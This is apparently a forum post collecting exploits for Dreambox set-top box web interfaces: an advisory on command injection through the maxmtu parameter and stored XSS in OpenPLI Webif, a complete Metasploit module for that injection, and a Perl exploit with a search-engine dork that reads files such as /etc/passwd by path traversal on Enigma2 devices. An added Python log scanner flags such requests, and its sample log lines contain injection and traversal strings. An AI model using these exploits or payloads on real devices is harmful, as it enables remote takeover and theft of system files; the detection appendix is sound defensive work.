Opinions .... ? Dreambox Security / Bugs .... ??? Discussions .... ????
###############################

Device Name: OpenPLI - Dream Multimedia Box with OpenPLI software
Vendor of device: Dream Multimedia
Vendor of Software: OpenPLI Community

============ Device Details: ============

Linux Kernel Linux version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1 Wed Aug 17 23:54:07 CEST 2011
Firmware release 1.1.0, 27.01.2013
FP Firmware 1.06
Web Interface 6.0.4-Expert - PLi edition by [lite]

More infos: [link hidden by forum]

============ Vulnerability Overview: ============

* OS Command Execution:

parameter: maxmtu

The vulnerability is caused by missing input validation in the maxmtu parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to use [link hidden by forum] to fully compromise the device.

[link hidden by forum]

It is possible to shorten the URL to the following:

[link hidden by forum]

There is [link hidden by forum] preinstalled on the device. It is a very small edition of [link hidden by forum], so you have to play a bit with it but you will get it ;)

* stored XSS:

Box Control -> Configuration -> Webserver -> User, Password
parameter: AuthUser, AuthPassword

Box Control -> Configuration -> Settings
parameter: audiochannelspriority

Injecting scripts into the parameter audiochannelspriority reveals that this parameter is not properly validated for malicious input.

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: [link hidden by forum]
Twitter: @s3cur1ty_de

#####################
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# [link hidden by forum]
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'OpenPLI Webif Arbitrary Command Execution',
      'Description' => %q{
          Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS command
        injection in the Webif 6.0.4 Web Interface. This is a blind injection, which means
        that you will not see any output of your command. A ping command can be used for
        testing the vulnerability. This module has been tested in a box with the next
        features: Linux Kernel version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1
        Wed Aug 17 23:54:07 CEST 2011, Firmware release 1.1.0 (27.01.2013), FP Firmware
        1.06 and Web Interface 6.0.4-Expert (PLi edition).
      },
      'Author'      => [ 'm-1-k-3' ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'OSVDB', '90230' ],
          [ 'BID', '57943' ],
          [ 'EDB', '24498' ],
          [ 'URL', '[link hidden by forum]' ],
          [ 'URL', '[link hidden by forum]' ]
        ],
      'Platform'    => ['unix', 'linux'],
      'Arch'        => ARCH_CMD,
      'Privileged'  => true,
      'Payload'     =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => '[link hidden by forum] generic'
            }
        },
      'Targets'        =>
        [
          [ 'Automatic Target', { }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 08 2013'
    ))
  end

  def exploit
    print_status("#{rhost}:#{rport} - Sending remote command...")
    vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
    begin
      send_request_cgi(
        {
          'uri'      => normalize_uri("cgi-bin", "setConfigSettings"),
          'method'   => 'GET',
          'vars_get' => {
            "maxmtu" => "1500&#{payload.encoded}&"
          }
        })
    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
      fail_with(Msf::Exploit::Failure::Unreachable, "#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
    end
  end
end
#!/usr/bin/perl
#
# Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote root file disclosure exploit
#
#
# Author: Todor Donev
# Email me: todor.donev@@gmail.com
# Platform: Linux
# Type: remote
#
#
# Gewgle Dork: "Enigma2 movielist" filetype:rss
#
#
#
# Enigma2 is a framebuffer-based zapping application (GUI) for linux.
# It's targeted to real set-top-boxes, but would also work on regular PCs.
# Enigma2 is based on the Python programming language with a backend
# written in C++. It uses the [LinuxTV DVB API], which is part of a standard linux kernel.
#
# Enigma2 can also be controlled via an Enigma2:WebInterface.
#
#
# Thanks to Tsvetelina Emirska !!
#
#
use LWP::Simple;

$t = $ARGV[0];
if(! $t) {usg();}
$d = $ARGV[1];
if(! $d) {$d = "/etc/passwd";}

my $r = get("[link hidden by forum]") or exit;
print "[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n";
print "[+] Target: $t\n";

if ($r =~ m/<e2webifversion>(.*)<\/e2webifversion>/g){
    print "[+] Image Version: $1\n";
}
if ($r =~ (m/1.6.0|1.6.1|1.6.2|1.6.3|1.6.4|1.6.5|1.6.6|1.6.7|1.6.8|1.6rc3|1.7.0/i)){
    print "[+] Exploiting Enigma2 via type1 (file?file=$d)\n";
    result(exploit1());
}
if ($r =~ (m/1.5rc1|1.5beta4/i)){
    print "[+] Exploiting Enigma2 via type2 (file/?file=../../../..$d)\n";
    result(exploit2());
}

sub usg{
    print "\n[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n";
    print "[+] Usage: perl enigma2.pl <victim> </path/file>\n";
    exit;
}

sub exploit1{
    my $x = get("[link hidden by forum]");
}

sub exploit2{
    my $x = get("[link hidden by forum]");
}

sub result{
    my $x= shift;
    while(defined $x){
        print "$x\n";
        print "[+] I got it 4 cheap.. =)\n";
        exit;
    }
}
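
Added example (not part of the original post or of either project's code): the input checks that are missing for the maxmtu and file parameters described above, used here to flag matching requests in a web access log. The log lines are constructed, and the MTU range, the /hdd/movie/ media root and the exact request paths are assumptions.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs

MEDIA_ROOT = "/hdd/movie/"  # assumption: only recordings should be served
REQ = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines; addresses and paths are illustrative.
SAMPLE_LOG = """\
192.0.2.10 - - [08/Feb/2013:10:00:01 +0100] "GET /cgi-bin/setConfigSettings?maxmtu=1500 HTTP/1.1" 200 512
192.0.2.66 - - [08/Feb/2013:10:02:13 +0100] "GET /cgi-bin/setConfigSettings?maxmtu=1500%26ping%20-c1%20192.0.2.1%26 HTTP/1.1" 200 512
192.0.2.66 - - [08/Feb/2013:10:03:40 +0100] "GET /file?file=/etc/passwd HTTP/1.1" 200 934
192.0.2.66 - - [08/Feb/2013:10:03:55 +0100] "GET /file/?file=../../../../etc/passwd HTTP/1.1" 200 934
192.0.2.10 - - [08/Feb/2013:10:05:00 +0100] "GET /file?file=/hdd/movie/news.ts HTTP/1.1" 200 4096
"""

def valid_mtu(value):
    """Accept only a plain decimal integer in an assumed MTU range."""
    return bool(re.fullmatch(r"[0-9]{1,5}", value)) and 68 <= int(value) <= 1500

def valid_file(value):
    """Accept only paths still under MEDIA_ROOT after '..' is resolved."""
    return posixpath.normpath(value).startswith(MEDIA_ROOT)

def scan(log_text):
    """Return (client, reason, decoded value) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQ.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        params = parse_qs(url.query, keep_blank_values=True)
        if url.path.endswith("/setConfigSettings"):
            for v in params.get("maxmtu", []):
                if not valid_mtu(v):
                    findings.append((client, "maxmtu-not-integer", v))
        elif url.path.rstrip("/").endswith("/file"):
            for v in params.get("file", []):
                if not valid_file(v):
                    findings.append((client, "file-outside-media-root", v))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same two predicates are what the web interface itself would need to apply before using either parameter; the log scan only shows which past requests would have been rejected.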